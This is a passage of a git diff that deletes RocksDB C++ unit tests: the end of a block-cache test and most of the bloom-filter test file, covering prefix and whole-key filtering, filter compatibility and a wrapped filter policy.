-    return;
-  }
-  int num_iter = 80;
-
-  // Run this test three iterations.
-  // Iteration 1: only a uncompressed block cache
-  // Iteration 2: only a compressed block cache
-  // Iteration 3: both block cache and compressed cache
-  // Iteration 4: both block cache and compressed cache, but DB is not
-  // compressed
-  for (int iter = 0; iter < 4; iter++) {
-    Options options = CurrentOptions();
-    options.write_buffer_size = 64 * 1024;  // small write buffer
-    options.statistics = rocksdb::CreateDBStatistics();
-
-    BlockBasedTableOptions table_options;
-    switch (iter) {
-      case 0:
-        // only uncompressed block cache
-        table_options.block_cache = NewLRUCache(8 * 1024);
-        table_options.block_cache_compressed = nullptr;
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        break;
-      case 1:
-        // no block cache, only compressed cache
-        table_options.no_block_cache = true;
-        table_options.block_cache = nullptr;
-        table_options.block_cache_compressed = NewLRUCache(8 * 1024);
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        break;
-      case 2:
-        // both compressed and uncompressed block cache
-        table_options.block_cache = NewLRUCache(1024);
-        table_options.block_cache_compressed = NewLRUCache(8 * 1024);
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        break;
-      case 3:
-        // both block cache and compressed cache, but DB is not compressed
-        // also, make block cache sizes bigger, to trigger block cache hits
-        table_options.block_cache = NewLRUCache(1024 * 1024);
-        table_options.block_cache_compressed = NewLRUCache(8 * 1024 * 1024);
-        options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-        options.compression = kNoCompression;
-        break;
-      default:
-        FAIL();
-    }
-    CreateAndReopenWithCF({"pikachu"}, options);
-    // default column family doesn't have block cache
-    Options no_block_cache_opts;
-    no_block_cache_opts.statistics = options.statistics;
-    no_block_cache_opts = CurrentOptions(no_block_cache_opts);
-    BlockBasedTableOptions table_options_no_bc;
-    table_options_no_bc.no_block_cache = true;
-    no_block_cache_opts.table_factory.reset(
-        NewBlockBasedTableFactory(table_options_no_bc));
-    ReopenWithColumnFamilies(
-        {"default", "pikachu"},
-        std::vector<Options>({no_block_cache_opts, options}));
-
-    Random rnd(301);
-
-    // Write 8MB (80 values, each 100K)
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-    std::vector<std::string> values;
-    std::string str;
-    for (int i = 0; i < num_iter; i++) {
-      if (i % 4 == 0) {  // high compression ratio
-        str = RandomString(&rnd, 1000);
-      }
-      values.push_back(str);
-      ASSERT_OK(Put(1, Key(i), values[i]));
-    }
-
-    // flush all data from memtable so that reads are from block cache
-    ASSERT_OK(Flush(1));
-
-    for (int i = 0; i < num_iter; i++) {
-      ASSERT_EQ(Get(1, Key(i)), values[i]);
-    }
-
-    // check that we triggered the appropriate code paths in the cache
-    switch (iter) {
-      case 0:
-        // only uncompressed block cache
-        ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_MISS), 0);
-        ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_MISS), 0);
-        break;
-      case 1:
-        // no block cache, only compressed cache
-        ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_MISS), 0);
-        ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_MISS), 0);
-        break;
-      case 2:
-        // both compressed and uncompressed block cache
-        ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_MISS), 0);
-        ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_MISS), 0);
-        break;
-      case 3:
-        // both compressed and uncompressed block cache
-        ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_MISS), 0);
-        ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_HIT), 0);
-        ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_MISS), 0);
-        // compressed doesn't have any hits since blocks are not compressed on
-        // storage
-        ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_HIT), 0);
-        break;
-      default:
-        FAIL();
-    }
-
-    options.create_if_missing = true;
-    DestroyAndReopen(options);
-  }
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_bloom_filter_test.cc b/thirdparty/rocksdb/db/db_bloom_filter_test.cc
deleted file mode 100644
index e6248a0..0000000
--- a/thirdparty/rocksdb/db/db_bloom_filter_test.cc
+++ /dev/null
@@ -1,1108 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/perf_context.h"
-
-namespace rocksdb {
-
-// DB tests related to bloom filter.
-
-class DBBloomFilterTest : public DBTestBase {
- public:
-  DBBloomFilterTest() : DBTestBase("/db_bloom_filter_test") {}
-};
-
-class DBBloomFilterTestWithParam
-    : public DBTestBase,
-      public testing::WithParamInterface<std::tuple<bool, bool>> {
-  //                             public testing::WithParamInterface<bool> {
- protected:
-  bool use_block_based_filter_;
-  bool partition_filters_;
-
- public:
-  DBBloomFilterTestWithParam() : DBTestBase("/db_bloom_filter_tests") {}
-
-  ~DBBloomFilterTestWithParam() {}
-
-  void SetUp() override {
-    use_block_based_filter_ = std::get<0>(GetParam());
-    partition_filters_ = std::get<1>(GetParam());
-  }
-};
-
-// KeyMayExist can lead to a few false positives, but not false negatives.
-// To make test deterministic, use a much larger number of bits per key-20 than
-// bits in the key, so that false positives are eliminated
-TEST_P(DBBloomFilterTestWithParam, KeyMayExist) {
-  do {
-    ReadOptions ropts;
-    std::string value;
-    anon::OptionsOverride options_override;
-    options_override.filter_policy.reset(
-        NewBloomFilterPolicy(20, use_block_based_filter_));
-    options_override.partition_filters = partition_filters_;
-    options_override.metadata_block_size = 32;
-    Options options = CurrentOptions(options_override);
-    if (partition_filters_ &&
-        static_cast<BlockBasedTableOptions*>(
-            options.table_factory->GetOptions())
-                ->index_type != BlockBasedTableOptions::kTwoLevelIndexSearch) {
-      // In the current implementation partitioned filters depend on partitioned
-      // indexes
-      continue;
-    }
-    options.statistics = rocksdb::CreateDBStatistics();
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    ASSERT_TRUE(!db_->KeyMayExist(ropts, handles_[1], "a", &value));
-
-    ASSERT_OK(Put(1, "a", "b"));
-    bool value_found = false;
-    ASSERT_TRUE(
-        db_->KeyMayExist(ropts, handles_[1], "a", &value, &value_found));
-    ASSERT_TRUE(value_found);
-    ASSERT_EQ("b", value);
-
-    ASSERT_OK(Flush(1));
-    value.clear();
-
-    uint64_t numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    uint64_t cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    ASSERT_TRUE(
-        db_->KeyMayExist(ropts, handles_[1], "a", &value, &value_found));
-    ASSERT_TRUE(!value_found);
-    // assert that no new files were opened and no new blocks were
-    // read into block cache.
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-
-    ASSERT_OK(Delete(1, "a"));
-
-    numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    ASSERT_TRUE(!db_->KeyMayExist(ropts, handles_[1], "a", &value));
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-
-    ASSERT_OK(Flush(1));
-    dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1],
-                                true /* disallow trivial move */);
-
-    numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    ASSERT_TRUE(!db_->KeyMayExist(ropts, handles_[1], "a", &value));
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-
-    ASSERT_OK(Delete(1, "c"));
-
-    numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    ASSERT_TRUE(!db_->KeyMayExist(ropts, handles_[1], "c", &value));
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-
-    // KeyMayExist function only checks data in block caches, which is not used
-    // by plain table format.
-  } while (
-      ChangeOptions(kSkipPlainTable | kSkipHashIndex | kSkipFIFOCompaction));
-}
-
-TEST_F(DBBloomFilterTest, GetFilterByPrefixBloom) {
-  for (bool partition_filters : {true, false}) {
-    Options options = last_options_;
-    options.prefix_extractor.reset(NewFixedPrefixTransform(8));
-    options.statistics = rocksdb::CreateDBStatistics();
-    BlockBasedTableOptions bbto;
-    bbto.filter_policy.reset(NewBloomFilterPolicy(10, false));
-    if (partition_filters) {
-      bbto.partition_filters = true;
-      bbto.index_type = BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-    }
-    bbto.whole_key_filtering = false;
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    DestroyAndReopen(options);
-
-    WriteOptions wo;
-    ReadOptions ro;
-    FlushOptions fo;
-    fo.wait = true;
-    std::string value;
-
-    ASSERT_OK(dbfull()->Put(wo, "barbarbar", "foo"));
-    ASSERT_OK(dbfull()->Put(wo, "barbarbar2", "foo2"));
-    ASSERT_OK(dbfull()->Put(wo, "foofoofoo", "bar"));
-
-    dbfull()->Flush(fo);
-
-    ASSERT_EQ("foo", Get("barbarbar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-    ASSERT_EQ("foo2", Get("barbarbar2"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-    ASSERT_EQ("NOT_FOUND", Get("barbarbar3"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-
-    ASSERT_EQ("NOT_FOUND", Get("barfoofoo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-
-    ASSERT_EQ("NOT_FOUND", Get("foobarbar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 2);
-
-    ro.total_order_seek = true;
-    ASSERT_TRUE(db_->Get(ro, "foobarbar", &value).IsNotFound());
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 2);
-  }
-}
-
-TEST_F(DBBloomFilterTest, WholeKeyFilterProp) {
-  for (bool partition_filters : {true, false}) {
-    Options options = last_options_;
-    options.prefix_extractor.reset(NewFixedPrefixTransform(3));
-    options.statistics = rocksdb::CreateDBStatistics();
-
-    BlockBasedTableOptions bbto;
-    bbto.filter_policy.reset(NewBloomFilterPolicy(10, false));
-    bbto.whole_key_filtering = false;
-    if (partition_filters) {
-      bbto.partition_filters = true;
-      bbto.index_type = BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-    }
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    DestroyAndReopen(options);
-
-    WriteOptions wo;
-    ReadOptions ro;
-    FlushOptions fo;
-    fo.wait = true;
-    std::string value;
-
-    ASSERT_OK(dbfull()->Put(wo, "foobar", "foo"));
-    // Needs insert some keys to make sure files are not filtered out by key
-    // ranges.
-    ASSERT_OK(dbfull()->Put(wo, "aaa", ""));
-    ASSERT_OK(dbfull()->Put(wo, "zzz", ""));
-    dbfull()->Flush(fo);
-
-    Reopen(options);
-    ASSERT_EQ("NOT_FOUND", Get("foo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-    ASSERT_EQ("NOT_FOUND", Get("bar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("foo", Get("foobar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-
-    // Reopen with whole key filtering enabled and prefix extractor
-    // NULL. Bloom filter should be off for both of whole key and
-    // prefix bloom.
-    bbto.whole_key_filtering = true;
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    options.prefix_extractor.reset();
-    Reopen(options);
-
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("NOT_FOUND", Get("foo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("NOT_FOUND", Get("bar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("foo", Get("foobar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    // Write DB with only full key filtering.
-    ASSERT_OK(dbfull()->Put(wo, "foobar", "foo"));
-    // Needs insert some keys to make sure files are not filtered out by key
-    // ranges.
-    ASSERT_OK(dbfull()->Put(wo, "aaa", ""));
-    ASSERT_OK(dbfull()->Put(wo, "zzz", ""));
-    db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-    // Reopen with both of whole key off and prefix extractor enabled.
-    // Still no bloom filter should be used.
-    options.prefix_extractor.reset(NewFixedPrefixTransform(3));
-    bbto.whole_key_filtering = false;
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    Reopen(options);
-
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("NOT_FOUND", Get("foo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("NOT_FOUND", Get("bar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("foo", Get("foobar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-
-    // Try to create a DB with mixed files:
-    ASSERT_OK(dbfull()->Put(wo, "foobar", "foo"));
-    // Needs insert some keys to make sure files are not filtered out by key
-    // ranges.
-    ASSERT_OK(dbfull()->Put(wo, "aaa", ""));
-    ASSERT_OK(dbfull()->Put(wo, "zzz", ""));
-    db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-    options.prefix_extractor.reset();
-    bbto.whole_key_filtering = true;
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    Reopen(options);
-
-    // Try to create a DB with mixed files.
-    ASSERT_OK(dbfull()->Put(wo, "barfoo", "bar"));
-    // In this case needs insert some keys to make sure files are
-    // not filtered out by key ranges.
-    ASSERT_OK(dbfull()->Put(wo, "aaa", ""));
-    ASSERT_OK(dbfull()->Put(wo, "zzz", ""));
-    Flush();
-
-    // Now we have two files:
-    // File 1: An older file with prefix bloom.
-    // File 2: A newer file with whole bloom filter.
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("NOT_FOUND", Get("foo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 2);
-    ASSERT_EQ("NOT_FOUND", Get("bar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 3);
-    ASSERT_EQ("foo", Get("foobar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 4);
-    ASSERT_EQ("bar", Get("barfoo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 4);
-
-    // Reopen with the same setting: only whole key is used
-    Reopen(options);
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 4);
-    ASSERT_EQ("NOT_FOUND", Get("foo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 5);
-    ASSERT_EQ("NOT_FOUND", Get("bar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 6);
-    ASSERT_EQ("foo", Get("foobar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 7);
-    ASSERT_EQ("bar", Get("barfoo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 7);
-
-    // Restart with both filters are allowed
-    options.prefix_extractor.reset(NewFixedPrefixTransform(3));
-    bbto.whole_key_filtering = true;
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    Reopen(options);
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 7);
-    // File 1 will has it filtered out.
-    // File 2 will not, as prefix `foo` exists in the file.
-    ASSERT_EQ("NOT_FOUND", Get("foo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 8);
-    ASSERT_EQ("NOT_FOUND", Get("bar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 10);
-    ASSERT_EQ("foo", Get("foobar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 11);
-    ASSERT_EQ("bar", Get("barfoo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 11);
-
-    // Restart with only prefix bloom is allowed.
-    options.prefix_extractor.reset(NewFixedPrefixTransform(3));
-    bbto.whole_key_filtering = false;
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    Reopen(options);
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 11);
-    ASSERT_EQ("NOT_FOUND", Get("foo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 11);
-    ASSERT_EQ("NOT_FOUND", Get("bar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 12);
-    ASSERT_EQ("foo", Get("foobar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 12);
-    ASSERT_EQ("bar", Get("barfoo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 12);
-  }
-}
-
-TEST_P(DBBloomFilterTestWithParam, BloomFilter) {
-  do {
-    Options options = CurrentOptions();
-    env_->count_random_reads_ = true;
-    options.env = env_;
-    // ChangeCompactOptions() only changes compaction style, which does not
-    // trigger reset of table_factory
-    BlockBasedTableOptions table_options;
-    table_options.no_block_cache = true;
-    table_options.filter_policy.reset(
-        NewBloomFilterPolicy(10, use_block_based_filter_));
-    table_options.partition_filters = partition_filters_;
-    if (partition_filters_) {
-      table_options.index_type =
-          BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-    }
-    table_options.metadata_block_size = 32;
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Populate multiple layers
-    const int N = 10000;
-    for (int i = 0; i < N; i++) {
-      ASSERT_OK(Put(1, Key(i), Key(i)));
-    }
-    Compact(1, "a", "z");
-    for (int i = 0; i < N; i += 100) {
-      ASSERT_OK(Put(1, Key(i), Key(i)));
-    }
-    Flush(1);
-
-    // Prevent auto compactions triggered by seeks
-    env_->delay_sstable_sync_.store(true, std::memory_order_release);
-
-    // Lookup present keys.  Should rarely read from small sstable.
-    env_->random_read_counter_.Reset();
-    for (int i = 0; i < N; i++) {
-      ASSERT_EQ(Key(i), Get(1, Key(i)));
-    }
-    int reads = env_->random_read_counter_.Read();
-    fprintf(stderr, "%d present => %d reads\n", N, reads);
-    ASSERT_GE(reads, N);
-    if (partition_filters_) {
-      // Without block cache, we read an extra partition filter per each
-      // level*read and a partition index per each read
-      ASSERT_LE(reads, 4 * N + 2 * N / 100);
-    } else {
-      ASSERT_LE(reads, N + 2 * N / 100);
-    }
-
-    // Lookup present keys.  Should rarely read from either sstable.
-    env_->random_read_counter_.Reset();
-    for (int i = 0; i < N; i++) {
-      ASSERT_EQ("NOT_FOUND", Get(1, Key(i) + ".missing"));
-    }
-    reads = env_->random_read_counter_.Read();
-    fprintf(stderr, "%d missing => %d reads\n", N, reads);
-    if (partition_filters_) {
-      // With partitioned filter we read one extra filter per level per each
-      // missed read.
-      ASSERT_LE(reads, 2 * N + 3 * N / 100);
-    } else {
-      ASSERT_LE(reads, 3 * N / 100);
-    }
-
-    env_->delay_sstable_sync_.store(false, std::memory_order_release);
-    Close();
-  } while (ChangeCompactOptions());
-}
-
-INSTANTIATE_TEST_CASE_P(DBBloomFilterTestWithParam, DBBloomFilterTestWithParam,
-                        ::testing::Values(std::make_tuple(true, false),
-                                          std::make_tuple(false, true),
-                                          std::make_tuple(false, false)));
-
-TEST_F(DBBloomFilterTest, BloomFilterRate) {
-  while (ChangeFilterOptions()) {
-    Options options = CurrentOptions();
-    options.statistics = rocksdb::CreateDBStatistics();
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    const int maxKey = 10000;
-    for (int i = 0; i < maxKey; i++) {
-      ASSERT_OK(Put(1, Key(i), Key(i)));
-    }
-    // Add a large key to make the file contain wide range
-    ASSERT_OK(Put(1, Key(maxKey + 55555), Key(maxKey + 55555)));
-    Flush(1);
-
-    // Check if they can be found
-    for (int i = 0; i < maxKey; i++) {
-      ASSERT_EQ(Key(i), Get(1, Key(i)));
-    }
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-
-    // Check if filter is useful
-    for (int i = 0; i < maxKey; i++) {
-      ASSERT_EQ("NOT_FOUND", Get(1, Key(i + 33333)));
-    }
-    ASSERT_GE(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), maxKey * 0.98);
-  }
-}
-
-TEST_F(DBBloomFilterTest, BloomFilterCompatibility) {
-  Options options = CurrentOptions();
-  options.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10, true));
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  // Create with block based filter
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  const int maxKey = 10000;
-  for (int i = 0; i < maxKey; i++) {
-    ASSERT_OK(Put(1, Key(i), Key(i)));
-  }
-  ASSERT_OK(Put(1, Key(maxKey + 55555), Key(maxKey + 55555)));
-  Flush(1);
-
-  // Check db with full filter
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10, false));
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  // Check if they can be found
-  for (int i = 0; i < maxKey; i++) {
-    ASSERT_EQ(Key(i), Get(1, Key(i)));
-  }
-  ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-
-  // Check db with partitioned full filter
-  table_options.partition_filters = true;
-  table_options.index_type =
-      BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10, false));
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  // Check if they can be found
-  for (int i = 0; i < maxKey; i++) {
-    ASSERT_EQ(Key(i), Get(1, Key(i)));
-  }
-  ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-}
-
-TEST_F(DBBloomFilterTest, BloomFilterReverseCompatibility) {
-  for (bool partition_filters : {true, false}) {
-    Options options = CurrentOptions();
-    options.statistics = rocksdb::CreateDBStatistics();
-    BlockBasedTableOptions table_options;
-    if (partition_filters) {
-      table_options.partition_filters = true;
-      table_options.index_type =
-          BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-    }
-    table_options.filter_policy.reset(NewBloomFilterPolicy(10, false));
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    DestroyAndReopen(options);
-
-    // Create with full filter
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    const int maxKey = 10000;
-    for (int i = 0; i < maxKey; i++) {
-      ASSERT_OK(Put(1, Key(i), Key(i)));
-    }
-    ASSERT_OK(Put(1, Key(maxKey + 55555), Key(maxKey + 55555)));
-    Flush(1);
-
-    // Check db with block_based filter
-    table_options.filter_policy.reset(NewBloomFilterPolicy(10, true));
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-    // Check if they can be found
-    for (int i = 0; i < maxKey; i++) {
-      ASSERT_EQ(Key(i), Get(1, Key(i)));
-    }
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-  }
-}
-
-namespace {
-// A wrapped bloom over default FilterPolicy
-class WrappedBloom : public FilterPolicy {
- public:
-  explicit WrappedBloom(int bits_per_key)
-      : filter_(NewBloomFilterPolicy(bits_per_key)), counter_(0) {}
-
-  ~WrappedBloom() { delete filter_; }
-
-  const char* Name() const override { return "WrappedRocksDbFilterPolicy"; }
-
-  void CreateFilter(const rocksdb::Slice* keys, int n,
-                    std::string* dst) const override {
-    std::unique_ptr<rocksdb::Slice[]> user_keys(new rocksdb::Slice[n]);
-    for (int i = 0; i < n; ++i) {
-      user_keys[i] = convertKey(keys[i]);
-    }
-    return filter_->CreateFilter(user_keys.get(), n, dst);
-  }
-
-  bool KeyMayMatch(const rocksdb::Slice& key,
-                   const rocksdb::Slice& filter) const override {
-    counter_++;
-    return filter_->KeyMayMatch(convertKey(key), filter);
-  }
-
-  uint32_t GetCounter() { return counter_; }
-
- private:
-  const FilterPolicy* filter_;
-  mutable uint32_t counter_;
-
-  rocksdb::Slice convertKey(const rocksdb::Slice& key) const { return key; }
-};
-}  // namespace
-
-TEST_F(DBBloomFilterTest, BloomFilterWrapper) {
-  Options options = CurrentOptions();
-  options.statistics = rocksdb::CreateDBStatistics();
-
-  BlockBasedTableOptions table_options;
-  WrappedBloom* policy = new WrappedBloom(10);
-  table_options.filter_policy.reset(policy);
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  const int maxKey = 10000;
-  for (int i = 0; i < maxKey; i++) {
-    ASSERT_OK(Put(1, Key(i), Key(i)));
-  }
-  // Add a large key to make the file contain wide range
-  ASSERT_OK(Put(1, Key(maxKey + 55555), Key(maxKey + 55555)));
-  ASSERT_EQ(0U, policy->GetCounter());
-  Flush(1);
-
-  // Check if they can be found
-  for (int i = 0; i < maxKey; i++) {
-    ASSERT_EQ(Key(i), Get(1, Key(i)));
-  }
-  ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-  ASSERT_EQ(1U * maxKey, policy->GetCounter());
-
-  // Check if filter is useful
-  for (int i = 0; i < maxKey; i++) {
-    ASSERT_EQ("NOT_FOUND", Get(1, Key(i + 33333)));
-  }
-  ASSERT_GE(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), maxKey * 0.98);
-  ASSERT_EQ(2U * maxKey, policy->GetCounter());
-}
-
-class SliceTransformLimitedDomain : public SliceTransform {
-  const char* Name() const override { return "SliceTransformLimitedDomain"; }
-
-  Slice Transform(const Slice& src) const override {
-    return Slice(src.data(), 5);
-  }
-
-  bool InDomain(const Slice& src) const override {
-    // prefix will be x????
-    return src.size() >= 5 && src[0] == 'x';
-  }
-
-  bool InRange(const Slice& dst) const override {
-    // prefix will be x????
-    return dst.size() == 5 && dst[0] == 'x';
-  }
-};
-
-TEST_F(DBBloomFilterTest, PrefixExtractorFullFilter) {
-  BlockBasedTableOptions bbto;
-  // Full Filter Block
-  bbto.filter_policy.reset(rocksdb::NewBloomFilterPolicy(10, false));
-  bbto.whole_key_filtering = false;
-
-  Options options = CurrentOptions();
-  options.prefix_extractor = std::make_shared<SliceTransformLimitedDomain>();
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("x1111_AAAA", "val1"));
-  ASSERT_OK(Put("x1112_AAAA", "val2"));
-  ASSERT_OK(Put("x1113_AAAA", "val3"));
-  ASSERT_OK(Put("x1114_AAAA", "val4"));
-  // Not in domain, wont be added to filter
-  ASSERT_OK(Put("zzzzz_AAAA", "val5"));
-
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ(Get("x1111_AAAA"), "val1");
-  ASSERT_EQ(Get("x1112_AAAA"), "val2");
-  ASSERT_EQ(Get("x1113_AAAA"), "val3");
-  ASSERT_EQ(Get("x1114_AAAA"), "val4");
-  // Was not added to filter but rocksdb will try to read it from the filter
-  ASSERT_EQ(Get("zzzzz_AAAA"), "val5");
-}
-
-TEST_F(DBBloomFilterTest, PrefixExtractorBlockFilter) {
-  BlockBasedTableOptions bbto;
-  // Block Filter Block
-  bbto.filter_policy.reset(rocksdb::NewBloomFilterPolicy(10, true));
-
-  Options options = CurrentOptions();
-  options.prefix_extractor = std::make_shared<SliceTransformLimitedDomain>();
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("x1113_AAAA", "val3"));
-  ASSERT_OK(Put("x1114_AAAA", "val4"));
-  // Not in domain, wont be added to filter
-  ASSERT_OK(Put("zzzzz_AAAA", "val1"));
-  ASSERT_OK(Put("zzzzz_AAAB", "val2"));
